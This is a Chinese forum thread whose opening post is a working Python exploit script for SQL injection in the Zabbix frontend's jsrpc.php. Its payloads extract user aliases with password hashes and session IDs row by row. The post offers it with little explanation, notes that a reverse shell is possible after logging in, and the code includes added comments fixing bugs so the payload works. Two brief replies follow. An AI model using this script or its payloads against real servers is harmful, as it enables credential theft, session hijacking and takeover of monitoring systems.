wuyan 发表于 2016-8-18 18:11:17

zabbix注入利用脚本


没什么好讲的,分析的文章也不想写了,就是 insert 注入(payload 经由 jsrpc.php 的 profileIdx2 参数进入,见下方脚本中的注释)。

#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import re
import sys
'''
===getpass payloads===
1./jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 1 from (select count(*),concat(floor(rand(0)*2), (select concat(alias,0x3a,passwd) from zabbix.users limit 1,1))x from information_schema.character_sets group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids=23297&action=showlatest&filter=&filter_task=&mark_color=1
2./jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
===session 获取===
1./jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,sessionid,0x7e))+from+sessions+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
'''

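def getpass(url, num):
    """Fetch one ``alias:passwd`` row from the ``users`` table and return the raw body.

    The request reuses the error-based payload from the header comment: the
    injected subquery wraps the value in ``0x7e,0x7e`` (``~~``) so the caller
    can pull it out of the duplicate-key error echoed by the frontend.

    Args:
        url: Base URL of the Zabbix frontend with no trailing slash;
            ``/jsrpc.php?...`` is appended verbatim.
        num: Zero-based row offset used in ``LIMIT num,1``. The caller walks
            this upwards one row per call.

    Returns:
        The HTTP response body (``requests`` ``.content``), unparsed.

    Raises:
        Whatever ``requests.get`` raises on connection failure or timeout.
    """
    # Build the query string from adjacent literals instead of one literal
    # with backslash continuations: a continuation inside a string keeps the
    # next line's indentation *in the string*, so the original sent
    # "groupid=&        hostid=0" and "floor        (rand(0)*2)" — the latter
    # is not a valid MySQL function call and broke the payload outright.
    # sid/timestamp/itemids are the captured values from the header comment.
    payload = (
        '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get'
        '&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0'
        '&pageFile=history.php&profileIdx=web.item.graph'
        '&profileIdx2=2 and (select 2333 from (select count(*),concat(floor(rand(0)*2),'
        ' (select concat(0x7e,0x7e,alias,0x3a,passwd,0x7e,0x7e) from users limit %s,1))x'
        ' from information_schema.character_sets group by x)y) '
        '&updateProfile=true&screenitemid=&period=3600&stime=20160817050632'
        '&resourcetype=17&itemids=23297&action=showlatest&filter=&filter_task='
        '&mark_color=1'
    ) % str(num)
    target = url + payload
    # A timeout keeps a stalled host from blocking the caller's row walk forever.
    return requests.get(target, timeout=15).content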

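def filter(content):
    """Print every value wrapped in ``~~...~~`` markers found in *content*.

    NOTE: this shadows the ``filter`` builtin. The name is kept because the
    ``__main__`` block calls it by this name.

    Args:
        content: Response body from ``getpass``/``getsession`` — ``str`` on
            Python 2, ``bytes`` on Python 3 (``requests`` ``.content``).

    Returns:
        True when at least one marker pair was found, False otherwise.  The
        original returned True even for an empty match list (``re.findall``
        does not raise on a miss), so a caller doing
        ``if not filter(response): break`` never stopped walking rows.
    """
    try:
        # Python 3 hands us bytes; decode so the str pattern can match.
        if not isinstance(content, str):
            content = content.decode('utf-8', 'replace')
        result = re.findall(r"~~(.*?)~~", content)
    except (TypeError, AttributeError):
        # Non-text input (e.g. None): keep the original best-effort "no hit".
        return False
    print(result)
    return bool(result)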

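def getsession(url, num):
    """Fetch one ``sessionid`` from the ``sessions`` table and return the raw body.

    Same request shape as ``getpass``; only the selected column and table
    differ. The value is wrapped in ``~~`` markers for the caller to extract.

    Args:
        url: Base URL of the Zabbix frontend with no trailing slash;
            ``/jsrpc.php?...`` is appended verbatim.
        num: Zero-based row offset used in ``LIMIT num,1``.

    Returns:
        The HTTP response body (``requests`` ``.content``), unparsed.

    Raises:
        Whatever ``requests.get`` raises on connection failure or timeout.
    """
    # Adjacent literals, not backslash continuation: a continuation inside a
    # string literal keeps the next line's indentation in the URL, which in
    # the original produced "floor        (rand(0)*2)" — not a valid MySQL
    # function call — and whitespace-prefixed parameter names.
    # sid/timestamp/itemids are the captured values from the header comment.
    payload = (
        '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get'
        '&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0'
        '&pageFile=history.php&profileIdx=web.item.graph'
        '&profileIdx2=2 and (select 2333 from (select count(*),concat(floor(rand(0)*2),'
        ' (select concat(0x7e,0x7e,sessionid,0x7e,0x7e) from sessions limit %s,1))x'
        ' from information_schema.character_sets group by x)y) '
        '&updateProfile=true&screenitemid=&period=3600&stime=20160817050632'
        '&resourcetype=17&itemids=23297&action=showlatest&filter=&filter_task='
        '&mark_color=1'
    ) % str(num)
    target = url + payload
    # A timeout keeps a stalled host from blocking the caller's row walk forever.
    return requests.get(target, timeout=15).content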

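def usage():
    """Print the two command-line forms accepted by the ``__main__`` block."""
    # print() with a single argument behaves identically on Python 2 and 3;
    # the bare print statement only parsed on Python 2.
    print("   usage1:        python zabbix.py xxx.com passwd")
    print("   usage2:       python zabbix.py xxx.com session\n")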
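if __name__ == '__main__':
    logo = '''\n
       _____   _   _   _      _____         _   
        |__/__ _| |__ | |__ (_)__|___|   ____| | __
          / // _` | '_ \| '_ \| \ \/ / |_ | | | |/ __| |/ /
       / /| (_| | |_) | |_) | |><|_|| |_| | (__|   <
        /____\__,_|_.__/|_.__/|_/_/\_\_|   \__,_|\___|_|\_\
       
        \n**************coded by bsmali4 2016-8-16*****************
        '''
    print(logo)
    if len(sys.argv) != 3:
        usage()
    else:
        # The original read ``sys.argv.strip('/')`` / ``sys.argv`` — a list
        # has no ``strip`` and the method compare never matched; presumably
        # the ``[1]``/``[2]`` subscripts were lost when the post was rendered.
        host = sys.argv[1].rstrip('/')
        method = sys.argv[2]
        # usage() shows a bare "xxx.com"; requests rejects a URL with no scheme.
        if '://' not in host:
            host = 'http://' + host
        if method == 'passwd':
            fetch = getpass
        elif method == 'session':
            fetch = getsession
        else:
            fetch = None
        if fetch is None:
            usage()
        else:
            # Walk LIMIT offsets 0..998 and stop at the first response that
            # carries no ~~...~~ marker (filter() returns False).
            for i in range(0, 999):
                if not filter(fetch(host, i)):
                    break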
       


登录后台后可以直接执行命令,反弹 shell 什么的是极好的。

冰琥珀 发表于 2016-8-19 14:21:57

这样真的好么,信不信我也直接丢个汇编代码然后说没啥好写的;P

No0d1es 发表于 2016-8-20 09:59:52

卧槽,居然没人来捧场。